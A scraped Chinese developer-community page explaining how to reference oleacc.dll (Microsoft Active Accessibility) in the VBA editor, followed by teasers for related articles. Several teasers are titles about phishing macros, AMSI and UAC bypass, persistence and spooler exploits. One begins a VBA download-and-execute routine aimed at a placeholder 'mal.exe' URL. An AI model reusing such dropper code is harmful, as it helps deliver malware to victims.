开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在VBA中自动引用'Accessibility(System32\oleacc.dll)‘

在VBA中自动引用'Accessibility(System32\oleacc.dll)'，可以通过以下步骤实现：

打开VBA编辑器：在Excel或其他Office应用程序中，按下Alt + F11键，打开VBA编辑器。
引用'Accessibility(System32\oleacc.dll)'：在VBA编辑器中，点击菜单栏的"工具"，然后选择"引用"。
找到并勾选"Microsoft Active Accessibility"：在"引用"对话框中，浏览列表，找到并勾选"Microsoft Active Accessibility"，然后点击"确定"按钮。
保存并关闭VBA编辑器：点击VBA编辑器的"文件"菜单，选择"保存"，然后关闭VBA编辑器。

现在，你的VBA项目中已经自动引用了'Accessibility(System32\oleacc.dll)'，你可以在代码中使用相关的功能和对象了。

关于'Accessibility(System32\oleacc.dll)'的概念：'Accessibility(System32\oleacc.dll)'是Microsoft Active Accessibility（MSAA）的一部分，它提供了一组API和工具，用于访问Windows操作系统中的可访问性信息。它允许开发人员创建无障碍的应用程序，以便残障人士能够更好地使用计算机。

'Accessibility(System32\oleacc.dll)'的分类：'Accessibility(System32\oleacc.dll)'属于辅助技术（Assistive Technology）领域，用于增强计算机系统的可访问性。

'Accessibility(System32\oleacc.dll)'的优势：通过使用'Accessibility(System32\oleacc.dll)'，开发人员可以实现无障碍的应用程序，提高应用程序的可用性和可访问性，使残障人士能够更好地与计算机进行交互。

'Accessibility(System32\oleacc.dll)'的应用场景：'Accessibility(System32\oleacc.dll)'广泛应用于开发无障碍应用程序、辅助工具和辅助技术，以帮助残障人士更好地使用计算机。它可以用于开发屏幕阅读器、屏幕放大器、语音识别软件等。

推荐的腾讯云相关产品和产品介绍链接地址：腾讯云提供了丰富的云计算服务和解决方案，但由于要求不能提及具体的云计算品牌商，无法给出腾讯云相关产品和产品介绍链接地址。你可以访问腾讯云官方网站，了解他们的云计算产品和服务。

相关搜索:如何在Access VBA中引用行和列如何在VBA中自引用单元格如何在excel VBA中引用命名列如何在VBA中引用当前User\Desktop位置如何在VBA for Excel中引用复选框如何在mongodb中自动删除ObjectId引用如何在vba中引用单元格中的文本如何在Access VBA中设置对运行对象的引用如何在Excel VBA中自动增加单元格引用，以便在每一列中运行宏？如何在firestore集合中引用自动生成的id 如何在Sanity.io中自动引用其他帖子？如何在VBA中自动命名新的Excel工作簿在word vba中如何在表格单元格中插入交叉引用如何在VBA中自动应用单元格中的文件路径？如何在MS EXCEL VBA非活动工作表中引用UsedRange 如何在Saga中重新分派操作，如redux工具包自动重新获取如何在Java中自动检测可疑的引用比较？如何在VBA中引用字符串中的单元格值？如何在Excel VBA中引用一系列行中的命名列如何在Excel VBA中自动按下消息框的“确定”按钮？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

红队 | CS加载宏上线初探

邮件钓鱼通常出现在APT攻击里面，但是在日常生活中我们的邮箱也会经常出现一些钓鱼邮件，为了更好的了解原理，我在本地探索了一下宏上线钓鱼邮件，分享出来供师傅们交流。

03

利用 RDPWRAP 做 RDP 劫持的威胁检测

这个系列的文章翻译由信安之路红蓝对抗小组的所有成员共同完成，后续将陆续发布，敬请期待！

01

VBA CreateObject函数如何找到所需要的依赖文件

使用VBA的CreateObject函数，这种情况下要知道COM对象的名称。

03

『新认知』原来python也可以完整地调用VBA的功能驱动OFFICE自动化

之前我一直以为，python对OFFICE的自动化，相较VBA的话，是有限的，就像openpyxl那样，需要有人去不断地追加维护才行。

01

干货 | Office文档钓鱼的实战和免杀技巧

原文链接:https://mp.weixin.qq.com/s/OdCrUOsVAscqOjWaq2w8hQ

02

regsvr32绕过(二)

发现主要是Cmdline这里报的错，当然分类这里是因为MSF的脚本内容触发了AMSI的内容：

02

PowerShell 拿到显卡信息

打开 PowerShell 输入代码可以看到下面内容，当然因为小伙伴的显卡和我不相同，拿到的字符串是不相同

02

VBE菜单——CommandBars对象

这些在VBA里也提供了相应的对象让我们去操作，这个就是CommandBars对象。

02

权限维持方法小结

WinlogonHack 是一款用来劫取远程3389登录密码的工具，在 WinlogonHack 之前有一个 Gina 木马主要用来截取 Windows 2000下的密码，WinlogonHack 主要用于截取 Windows XP 以及 Windows 2003 Server

01

PowerShell 拿到显卡信息

打开 PowerShell 输入代码可以看到下面内容，当然因为小伙伴的显卡和我不相同，拿到的字符串是不相同

04

win7下myeclipse/eclipse使用subclipse进行checkout时自动关闭问题

现象：WIN7 32bit，myeclipse/eclipse用subclipse插件，输入url进行checkout操作时，窗口自动关闭，从日志中看： # # An unexpected error has been detected by HotSpot Virtual Machine: # # EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x3623804c, pid=1256, tid=8876 # # Java VM: Java HotSpot(TM) Client VM (1.5.0_11-b03 mixed mode) # Problematic frame: # C [libapr-1.dll+0x804c] # --------------- T H R E A D --------------- Current thread (0x34b66580): JavaThread "ModalContext" [_thread_in_native, id=8876] siginfo: ExceptionCode=0xc0000005, reading address 0x00000000 Registers: EAX=0x36f3bb70, EBX=0x00000000, ECX=0x00000000, EDX=0x00000000 ESP=0x36228c74, EBP=0x36228c80, ESI=0x338ff0e8, EDI=0x00000000 EIP=0x3623804c, EFLAGS=0x00010246 Top of Stack: (sp=0x36228c74) 0x36228c74: 00000000 338ff0e8 36f3bb70 3622acac 0x36228c84: 361d1f32 3622aca8 36f3bb70 00000000 0x36228c94: 00000000 00000000 338ff0e8 36f3bb70 0x36228ca4: 00000000 36f3bb70 00000000 36f3bb70 0x36228cb4: 36f3bc10 6eec84f1 36f3bb70 00000010 0x36228cc4: 6ee40000 6eec11f2 36f3bb70 36f3bc10 0x36228cd4: 6eec1210 6eec8610 36f3bb70 36f3bbc0 0x36228ce4: 36f3bb70 36f3bb70 00000000 003a0043 Instructions: (pc=0x3623804c) 0x3623803c: 89 55 10 53 8b 5d 14 56 57 85 db 75 03 8b 58 18 0x3623804c: 8b 03 bf 01 00 00 00 3b c7 0f 82 1a 01 00 00 8b Stack: [0x361f0000,0x36230000), sp=0x36228c74, free space=227k Native frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code) C [libapr-1.dll+0x804c] C [libapriconv-1.dll+0x1f32] C [libapriconv-1.dll+0x1da4] C [_tbl_simple.so+0x123b] C [_tbl_simple.so+0x11c4] Java frames: (J=compiled Java code, j=interpreted, Vv=VM code) j org.tigris.subversion.javahl.SVNClient.info2(Ljava/lang/String;Lorg/tigris/subversion/javahl/Revision;Lorg/tigris/subversion/javahl/Revision;Z)[Lorg/tigris/subversion/javahl/Info2;+0 j org.tigris.subversion.svnclientadapter.javahl.AbstractJhlClientAdapter.getInfo(Lorg/tigris/subversion/svnclientadapter/SVNUrl;Lorg/tigris/subversion/svnclientadapter/SVNRevision;Lorg/tigris/

02

C#中DllImport用法汇总

最近使用DllImport，从网上google后发现，大部分内容都是相同，又从MSDN中搜集下，现将内容汇总，与大家分享。

01

OCX制作CAB,数字签名制作

大家好，又见面了，我是你们的朋友全栈君。从网上找了些相关的资料，最终制作成功，做个小的总结：

02

在 PowerShell 中使用 SQ

使用SQL Server 2008 R2的安装光盘，安装SSMS，即可将所需的插件全部安装并自动注册。

01

钓鱼常用的vba代码

点击上方蓝字关注我们下载并执行程序 Private Sub DownloadAndExecute() Dim droppingURL As String Dim localPath As String Dim WinHttpReq As Object, oStream As Object Dim result As Integer droppingURL = "https://example.com/mal.exe" localPath = "c

04

技术分享|amsi绕过总结

Antimalware Scan Interface(AMSI)为反恶意软件扫描接口。

02

贼心不死，海莲花APT组织一季度攻击活动揭秘

“海莲花”（又名APT32、OceanLotus），被认为是来自越南的APT攻击组织，自2012年活跃以来，一直针对中国的敏感目标进行攻击活动，是近几年来针对中国大陆进行攻击活动的最活跃的APT攻击组织之一。

02

在Windows中劫持DLL

DLL劫持是一种用于执行恶意有效负载的流行技术，这篇文章列出了将近300个可执行文件，它们容易受到Windows 10(1909)上相对路径DLL劫持的攻击，并展示了如何使用几行VBScript绕过UAC可以以提升的特权执行某些DLL劫持。

01

An unexpected error has been detected by Java Runtime Environment

最近团队内部遇到一个非常奇怪的问题。网上有人说是sun公司的bug，我在这里贴一下，有兴趣的同志可以研究一下。据说，换一个java版本就好了，团队内部正在进行升级java版本。 sun公司官网解释： https://www.java.net/node/670924 程序异常error如下：

02

Windows10更新KB5006670后打印机无法使用解决

1.找一台未更新前的或者卸载更新的正常电脑，C:WindowsSystem32Win32spl.dll拷贝出来，命名为Win32spl.dll.good【文章底部提供下载】在更新后的问题电脑上操作： 2.将Win32spl.dll.good放入c盘根目录。 3.新建文本文档，拷贝以下代码，保存，修改后缀为.bat

03

CVE-2021-1675 Windows Print Spooler RCE EXP

让我们检查一下关于 RpcAddPrinterDriver 调用的 MS-RPRN：打印系统远程协议。

02

Windows 10 自带那么多图标，去哪里找呢？

2018-02-27 15:11

01

WastedLocker勒索软件分析

写在前面的话网络犯罪分子在具有针对性的攻击活动中使用勒索软件，已经成为了一种很常见的现象了。每个月都会出现新的勒索软件攻击事件，有的时候甚至会更加频繁。在今年的上半年，WastedLocker勒索软件的活动日趋频繁，我们在这篇文章中，将对一个WastedLocker勒索软件样本进行详细的技术分析。命令行参数需要注意的是，WastedLocker拥有一个命令行接口，它支持处理多个由攻击者控制的参数，而这些参数将控制WastedLocker的行为。 -p <directory-path> 优先处理：该参数

01

Windows中常见后门持久化方法总结

当我们通过各种方法拿到一个服务器的权限的时候，我们下一步要做的就是后渗透了，而后门持久化也是我们后渗透很重要的一部分，下面我来总结一下windows下常见的后门持久化的方法

02

usb.core NoBackendError, pyinstaller

在调试pyusb时，发现直接python scripts.py可以正常运行，但是打包成exe，即经过了 pyinstaller -F scripts.py ./scripts.exe运行就失败，提示错误是 usb.core.NoBackendError: No backend available.

00

[译] APT分析报告：04.Kraken新型无文件APT攻击利用Windows错误报告服务逃避检测

这是作者新开的一个专栏，主要翻译国外知名的安全厂商APT报告文章，了解它们的安全技术，学习它们溯源APT组织的方法，希望对您有所帮助。前文分享了APT组织Fin7 / Carbanak的Tirion恶意软件，包括OpBlueRaven行动。这篇文章将介绍一种新型无文件APT攻击Kraken，它会利用Windows错误报告服务逃避检测。其中，DllMain函数反分析检查，以确保它不在分析/沙箱环境或调试器中运行非常值得我们学习。

03

Windows系统关键目录的文件有缺失或存在异常或出现新文件可能导致哪些后果

Windows系统关键目录很多，这些目录文件有缺失或存在异常或出现新文件可能导致严重后果，下面举几种常见例子，后续遇到了新case会再增补。

05

Cygwin中无法使用dig的一种解决方案

6月虽然刚刚过去一半，但是已经通过Machine Learning的学习法则可以推测出这一个月都要在非常忙碌中度过了，连续三个周末都要去其他城市度过。然后最近接了一个西班牙的已经开始了很久很久的项目，算是半途入坑的节奏，所以每天从早搞到深夜，感觉睡眠要严重不足了，而且咄咄逼人的各种被MUST，着实有一种随时想要骂人的冲动，是要calm down了。

02

Window 提权基础

再加上个人的理解写出的关于 Windows 提权基础的文章，其中有些地方因为不太实用所以做了适当修改，感谢 @hl0rey 的帮助和建议。

00

九、将cs文件快速的转换成可执行文件和响应文件(配置编译开关的文件)

1、将包含多个类型的源代码文件转换为可以部署的文件。有如下Program.cs的文件,代码如下: public sealed class Program { public static void Main(string[] args) { System.Console.WriteLine("Hello World"); System.Console.ReadKey(); } } 该应用程序实现了打

07

编程打开控制面板及各项

大家好，又见面了，我是你们的朋友全栈君。程序打组件服务C:\WINDOWS\system32\Com\comexp.msc 注销程序路径 C:\WINDOWS\system32\logoff.exe 智能ABC的用户词库位置 C:\Documents and Settings\用户名\ApplicationData\Microsoft\IME\winabc 造字程序的路径C:\WINDOWS\system32\eudcedit.exe 语言栏显示程序路径C:\WINDOWS\system32\ctfmon

01

Windows 系统提权方式汇总

在渗透测试中，提升自己的权限是经常遇到的问题，往往在渗透中最容易获取的权限就是一个webshell，如果网站是架设在Windows系统上的，这时就可能遇到这样的问题，还有一种情况是在做横向渗透的时候，收集到一些可以远程连接桌面的帐号，这是也需要，在实际的渗透中有很多的地方会需要这个操作，这个系列就主要介绍各种提权的方式。

03

渗透测试与开发技巧

https://github.com/3gstudent/Pentest-and-Development-Tips

02

干货 | 最全Windows权限维持总结

红队人员拿到一台主机权限后首先会考虑将该机器作为一个持久化的据点，种植一个具备持久化的后门，从而随时可以连接该被控机器进行深入渗透。通俗的说抓到一条鱼,不能轻易放走了。

03

Windows常见的持久化后门汇总

持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用.

03

投递恶意lnk使用JwsclTerminalServer实现远程控制和信息获取

拼接字符串，调用bitsadmin.exe从远程服务器将加密后的文件下载到C:\Users\Public\Libraries\ldpwaf目录下，接着调用certutil.exe在本地解密该文件，命令如下：

01

[教程]黑客级别的批量处理文件

老司机上车了！！！！！！我們知道，批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。一.简单批处理内部命令简介 1.Echo

03

[教程]黑客级别的批量处理文件

老司机上车了！！！！！！我们知道，批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。一.简单批处理内部命令简介 1.Echo 命令

05

BypassUAC技术总结

用户帐户控制（User Account Control，简写作UAC)是微软公司在其[Windows Vista](https://baike.baidu.com/item/Windows Vista)及更高版本操作系统中采用的一种控制机制，保护系统进行不必要的更改，提升操作系统的稳定性和安全性。管理员在正常情况下是以低权限运行任务的，这个状态被称为被保护的管理员。但当管理员要执行高风险操作（如安装程序等），就需要提升权限去完成这些任务。这个提升权限的过程通常是这样的，相信各位都眼熟过。

03

windows中常见后门持久化方法总结

当我们通过各种方法拿到一个服务器的权限的时候，我们下一步要做的就是后渗透了，而后门持久化也是我们后渗透很重要的一部分，下面我来总结一下windows下常见的后门持久化的方法

02

微软通杀漏洞-CVE-2021-1675复现

或许需要：SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限

03

Windows10家庭中文版使用配置

描述: Win10 家庭版并不提供远程桌面服务, 只能采用第三方软件（rdpwrap）实现远程桌面，此项目的目标是启用远程桌面主机支持和并发 RDP 会话，以简化家庭使用的功能系统。项目地址: https://github.com/stascorp/rdpwrap 注意事项: 建议使用 RDP 包装器安装 .dll 版本文件。如果您以前用其他修补程序修改过它，它随时可能会变得不稳定和崩溃。

01

Kaspersky AVP.exe DLL 劫持

Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。

02

进攻性横向移动

横向移动是从一个受感染的宿主移动到另一个宿主的过程。渗透测试人员和红队人员通常通过执行 powershell.exe 在远程主机上运行 base64 编码命令来完成此操作，这将返回一个信标。问题在于攻击性 PowerShell 不再是一个新概念，即使是中等成熟的商店也会检测到它并迅速关闭它，或者任何半体面的 AV 产品都会在运行恶意命令之前将其杀死。横向移动的困难在于具有良好的操作安全性 (OpSec)，这意味着生成尽可能少的日志，或者生成看起来正常的日志，即隐藏在视线范围内以避免被发现。这篇博文的目的不仅是展示技术，但要显示幕后发生的事情以及与之相关的任何高级指标。我将在这篇文章中引用一些 Cobalt Strike 语法，因为它是我们主要用于 C2 的语法，但是 Cobalt Strike 的内置横向移动技术是相当嘈杂，对 OpSec 不太友好。另外，我知道不是每个人都有 Cobalt Strike，所以在大多数示例中也引用了 Meterpreter，但这些技术是通用的。

01

渗透中的后门利用

本文主要介绍权限维持，介绍如何在有一定权限的情况下，留下后门。当然各类后门太多太多了，这里主要列举一些常用的、方便的。

03

Evasor - 自动化查找可执行文件的安全评估工具 (蓝队/应急响应神器)

被黑客入侵，还在苦苦一步步去找哪里被中了木马？看哪个恶意进程？哪个外联端口吗？

02

主机安全自动升级概率性导致低版本Windows系统卡顿

现象：本地连接ncpa.cpl打不开、任务管理器taskmgr打不开、cmd或powershell卡住、eventvwr打不开、浏览器卡住、RDP远程卡住、ping ip是通的、ping域名没有反应、云监控agent报错并丢失基础监控图像、openvpn等业务服务报错、系统服务CryptSvc报错、系统服务NlaSvc报错（以上现象，重启机器后全都恢复正常）

02

SpoolFool：Windows Print Spooler 权限提升 (CVE-2022-21999)

早在 2020 年 5 月，微软就修复了一个 Windows Print Spooler 权限提升漏洞。该漏洞的编号为 CVE-2020–1048，微软承认 SafeBreach Labs 的 Peleg Hadar 和 Tomer Bar 报告了该安全问题。在补丁发布的同一天，Yarden Shafir和Alex Ionescu发表了关于该漏洞的技术文章。本质上，用户可以通过创建指向磁盘上文件的打印机端口来写入任意文件。在修补漏洞 (CVE-2020–1048) 后，Print Spooler 现在将在添加端口之前检查用户是否有权创建或写入文件。补丁和博文发布一周后，Paolo Stagno（又名 VoidSec）私下向微软披露了 CVE-2020–1048 的绕过方法。该绕过在三个月后的 2020 年 8 月得到修补，微软承认有八个独立实体报告了该漏洞，该漏洞被确定为 CVE-2020-1337。该漏洞的绕过使用目录连接（符号链接）来规避安全检查。假设用户创建了目录C:\MyFolder\并配置了一个打印机端口以指向该文件C:\MyFolder\Port。该操作将被授予，因为确实允许用户创建C:\MyFolder\Port. 现在，如果用户随后变成C:\MyFolder\指向C:\Windows\System32\创建端口之后的目录连接会发生什么？好吧，Spooler 会简单地写入文件C:\Windows\System32\Port。

03

PrintNightmare

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service》相关POC和漏洞信息

01

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭